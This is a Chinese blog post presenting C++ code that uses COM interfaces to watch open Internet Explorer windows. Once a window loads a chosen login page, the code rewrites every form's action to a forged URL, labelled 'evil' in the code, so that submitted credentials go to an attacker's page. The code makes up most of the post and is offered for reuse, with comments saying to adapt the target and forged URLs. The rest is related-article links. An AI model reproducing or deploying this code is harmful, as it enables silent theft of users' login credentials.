IE浏览器html post拦截并重定向

最新推荐文章于 2025-05-21 00:30:00 发布
原创 最新推荐文章于 2025-05-21 00:30:00 发布 · 2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种方法,通过COM接口操作IE浏览器,实现对打开页面中的表单Action属性进行修改,以达到特定目的。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


#include "stdafx.h"
#include "windows.h"
#include "exdisp.h"
#include "mshtml.h"

BOOL IsReadyTarget(IWebBrowser2 *browser)
{
    HRESULT hr;
    VARIANT_BOOL vBool;
    BSTR bstrUrl;
    BOOL bRet = FALSE;
    LPWSTR szTarget = L"http://localhost/login.php"; //这是我的本地测试页面,具体情况具体修改!

    //我们需要重视站点中可见的部分
    browser->get_Visible(&vBool);
    if (!vBool)
        return FALSE;

    //获取当前URL
    hr = browser->get_LocationURL(&bstrUrl);
    if (hr !=S_OK || !bstrUrl)
        return FALSE;

    //检查URL并等待加载
    if (wcsstr((LPCWSTR)bstrUrl,szTarget) !=NULL) {
        do
        {
            browser->get_Busy(&vBool);
            Sleep(1000);
        } while (vBool);
        bRet = TRUE;
    }
    SysFreeString(bstrUrl);
    return bRet;
}

BOOL ReplaceForms(IHTMLDocument2 *doc)
{
    HRESULT hr;
    IHTMLElementCollection *forms;
    IHTMLFormElement *element;
    IDispatch *theform;
    VARIANT vEmpty;
    VARIANT vIndexForms;
    LONG CountForms;
    BOOL bRet = FALSE;
    BSTR bstrEvil = SysAllocString(L"http://localhost/nandi.php");  //这里是我伪造的action,具体情况具体分析

    //查询doc表单
    hr = doc->get_forms((IHTMLElementCollection**)&forms);

    if (hr != S_OK || !forms)
        return FALSE;

    //在doc中循环每一个表单元素
    forms->get_length(&CountForms);
    for (int j=0; j<CountForms;j++)
    {
        vIndexForms.lVal = j;
        vIndexForms.vt = VT_I4;

        hr = forms->item( vEmpty,vIndexForms,(IDispatch**)&theform);
        if (hr !=S_OK || !theform)
        {
            continue;
        }
        //取得表单元素
        hr = theform->QueryInterface(IID_IHTMLFormElement,
            (void**)&element);
        if (hr == S_OK && element)
        {
            //替换action的地址
            hr = element->put_action(bstrEvil);
            if (hr == S_OK)
            {
                bRet = TRUE;
            }
            element->Release();
        }
        theform->Release();
    }

    forms->Release();
    SysFreeString(bstrEvil);
    return bRet;
}
int _tmain(int argc, _TCHAR* argv[])
{
    HRESULT hr;
    IShellWindows *shell;
    IDispatch *folder;
    IDispatch *html;
    IWebBrowser2 *browser;
    IHTMLDocument2 *doc;
    LONG Count;
    VARIANT vIndex;
    BOOL bDone = FALSE;

    CoInitialize(NULL);

    DWORD dwFlags = CLSCTX_REMOTE_SERVER|
        CLSCTX_LOCAL_SERVER|
        CLSCTX_INPROC_HANDLER|
        CLSCTX_INPROC_SERVER;

    //等待用户访问目标页面

    while(1)
    {

        //激活IShellWindows接口
        hr = CoCreateInstance(CLSID_ShellWindows,
            NULL,dwFlags,
            IID_IShellWindows, (void **)&shell);

        if(hr != S_OK)
        {
            printf("CoCreateInstance failed:0x%x!\n",hr);
            break;
        }

        //遍历循环所有存在的IE窗口
        shell->get_Count(&Count);
        for(int i=0; i < Count;i++)
        {
                vIndex.vt = VT_I4;
                vIndex.lVal = i;

                 hr = shell->Item(vIndex, (IDispatch **)&folder);
                if (hr !=S_OK || !folder)
                {
                    continue;
                }

                //尝试激活IWebBrowser2接口
                hr = folder->QueryInterface(IID_IWebBrowser2,
                    (void **)&browser);
                if (hr !=S_OK || !browser)
                {
                    folder->Release();
                    continue;
                }

                //当用户访问目标页面,等待页面加载完成,从浏览器提取IHTMLDocument接口,然后尝试进行注入HTML
                if (IsReadyTarget(browser))
                {
                    hr = browser->get_Document((IDispatch**)&html);
                    if (hr == S_OK && html)
                    {
                        hr = html->QueryInterface(IID_IHTMLDocument2,
                            (void**)&doc);
                        if (hr == S_OK && doc)
                        {
                            bDone = ReplaceForms(doc);
                            doc->Release();
                        }
                        html->Release();
                    }
                }
                browser->Release();
          }

          shell->Release();
          //如果成功,结束循环
          if(bDone)
                break;
          Sleep(1000);
        }

        CoUninitialize();
        return 0;
}


IE下JQ使用POST请求后台乱码解决
黄伟的博客
11-05 1193
之前使用JQ在CHROME下测试代码后台接收的参数没有乱码完美通过,但是今天在IE下测试时发现添加的数据展示是乱码 先上我们一般的写法 $.post(" usr!getUsrList.do?name="+name+"&roleId="+roleid+"&dpid="+dpid,"",function(data){ $("#body").html(data
IE插件直接观察http协议执行细节捕获POST和GET方法.rar
05-02
IE插件直接观察http协议执行细节捕获POST和GET方法.rar
IE浏览器post提交时中文乱码的解决方法
10-26
post提交时中文乱码,想必大家都有遇到过吧,采用的解决方法是在网页端转码,在服务器端再转回来,具体的实现如下,感兴趣的朋友可以参考下,希望对大家有所帮助
用VC++对IE浏览器进行高级操作
无名剑
10-13 1144
————————————————以下为程序代码—————————————------------WriteReg()函数的主要内容:-----------void CTestView::WriteReg(){    //建立上下文菜单    HKEY phkResult;    LPCTSTR lpSubKey = "Software//Microsoft//Internet Explorer//
【HTTP核心原理】GET/POST请求终极对决!转发与重定向的底层逻辑与实战避坑指南
最新发布
学习成长日记
05-21 1457
【HTTP核心原理】GET/POST请求终极对决!转发与重定向的底层逻辑与实战避坑指南
关于IEajaxpost请求无法获取数据的BUG
锦瑟年华的博客
08-13 2769
关于IEajaxpost请求无法获取数据的BUG问题描述:上个星期接手了一个网站,要求兼容ie,使用的是jquery,其中获取数据的部分采用了jquery的ajax方法。但是问题来了,我用post请求拿回了数据,并且在chrom,firefox和ie10+浏览器上使用时都没有问题。 但是但是当我在ie9及以下浏览器测试的时候,发现数据没了,(我去,这不科学啊),难道是我写错了? 于是我
html发送post定向,使用jquery在POST请求后重定向
weixin_28878311的博客
06-25 473
我正在使用Django.我有一个HTML页面,我在那里做一些Javascript的东西,然后我用这种方式做一个jQuery帖子:$.ajax({url: '/xenopatients/measurement/qual',type: 'POST',data: {'obj':data},dataType: 'json',contentType: "application/json; charset=u...
IE浏览器post请求的请求参数在正文中的请求正文中
Java持续实践
11-13 6362
点击某个post请求, 点击正文. 即可查看到参数.
ie6 sp1出现“重定向到不安全的连接”的解决放案
wanghuiting2008的专栏
12-12 4891
 当您单击一个链接或向一个表单提交数据时,如果该链接或该表单将 MicrosoftInternet Explorer 6 Service Pack 1 (SP1) 从安全网站 (https://) 重定向到另一个网站,可能会收到以下警告消息: 安全警报即将重定向到不安全的连接。您正在发送到当前站点的信息可能重新传送到不安全的站点。是否继续?即使您没有选中“Internet 选项”对话框中“高级”选
通过禁用IEToEdge BHO,禁止IE自动跳转(重定向)到EDGE
热门推荐
The 44th Demilitarized Zone
03-21 2万+
不过微软在Win10 20H2中引入了IEToEdge BHO,使用“强提示”来“推荐”用户使用Edge。更是在某个时间点后,强行将IE用户“绑架”(重定向)至Edge,非常不讲武德。很多用户尽管升级到了Windows10,但仍有使用IE的需求。右侧找到名称为“{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}”的键值,将其值设置为0。打开组策略编辑器,定位到 计算机配置(用户配置)——管理模板——Microsoft Edge。,并将其值设置为“1”(不含引号)。
谷歌浏览器插件:修改接口响应、重定向以及拦截url
西凉的悲伤博客
11-05 2万+
对于一般接口测试和开发来说经常需要调试接口,对接口数据拦截修改来查看页面变化。一般会选用Fiddler或Fiddler everwhere来拦截接口调试,Fiddler和Fiddler everwhere都可以拦截电脑的各种应用的请求,Fiddler界面太丑了,而Fiddler everwhere只有30天试用期,所以很不方便。 如果你只想拦截浏览器的请求或修改参数响应,那么一款优秀的拦截url请求的插件你必须拥有: Requestly: Redirect Url, Modify Headers etc 1
http 解决post请求重定向的问题
添砖加瓦
12-10 3696
import org.apache.commons.httpclient.Header; import org.apache.commons.httpclient.HttpClient; import org.apache.commons.httpclient.HttpStatus; import org.apache.commons.httpclient.NameValuePair; impo...
所有浏览器都被劫持定向之后再跳转到自定义主页
cpych的专栏
11-16 1853
恶意网址 : ljd1.gndh666.top ie.0739110.com ljd7.gndh666.top 这个问题有大半年了都没人能解决。半路还杀出个妖怪,这个之后再讲 1. 经过:win使用小马激活或者暴风激活(小马的多年前可以用,现在当年的文件估计里面的一些服务地址被人恶意使用,已经变成了病毒)破解之后发现只要打开浏览器,就会被强制先跳转到一个网址,然后再跳到自己设置的主页【暴风激活目前可以激活系统,但是代价就是浏览器劫持,先跳转到那几个恶意网址,再跳到自定义的主页】。 2. 最初好
浏览器模拟post请求
dgq1989101的博客
08-08 3332
PostCSS HTML语法解析器:简析与入门指南
这些预处理器语法通常需要各自的解析器插件,例如`postcss-sass`或`postcss-less`。 #### 用例说明 以下是一个简单的用例,展示了如何在JavaScript代码中引入并使用`postcss-html`来处理HTML文件中的样式。 ```...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值